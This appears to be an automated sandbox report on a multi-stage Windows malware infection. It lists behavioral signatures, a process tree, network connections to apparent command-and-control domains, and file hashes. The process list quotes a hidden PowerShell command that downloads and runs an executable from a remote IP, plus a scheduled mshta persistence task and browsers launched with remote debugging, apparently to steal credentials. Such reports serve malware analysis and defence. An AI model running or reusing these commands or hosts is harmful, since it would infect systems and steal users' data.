| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3900 set thread context of 3604 | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| PID 5240 set thread context of 5128 | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860889933168" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "ZDWezmacBOG" /tr "mshta \"C:\Temp\DWmIMSN8O.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\mshta.exe
mshta "C:\Temp\DWmIMSN8O.hta"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3900 -ip 3900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 800
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff952f5cc40,0x7ff952f5cc4c,0x7ff952f5cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1968 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3644 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe
"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5024 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5068 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5240,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5184 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff952f646f8,0x7ff952f64708,0x7ff952f64718
C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5240 -ip 5240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 788
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | go.advisewise.me | udp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| US | 8.8.8.8:53 | e6.o.lencr.org | udp |
| GB | 2.23.210.82:80 | e6.o.lencr.org | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| US | 8.8.8.8:53 | embarkiffe.shop | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 172.217.23.196:443 | www.google.com | tcp |
| NL | 172.217.23.196:443 | www.google.com | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 216.58.214.10:443 | ogads-pa.googleapis.com | udp |
| NL | 172.217.168.206:443 | apis.google.com | udp |
| NL | 216.58.214.10:443 | ogads-pa.googleapis.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| NL | 142.250.179.129:443 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | calmingtefxtures.run | udp |
| US | 172.67.158.171:443 | calmingtefxtures.run | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 172.67.164.79:443 | tracnquilforest.life | tcp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| DE | 116.203.10.65:443 | go.advisewise.me | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.96.1:443 | foresctwhispers.top | tcp |
| US | 104.21.96.1:443 | foresctwhispers.top | tcp |
| US | 104.21.96.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
memory/4508-0-0x00007FF9526A3000-0x00007FF9526A5000-memory.dmp
memory/4508-1-0x0000020E21E70000-0x0000020E21E92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpfztjut.3gs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
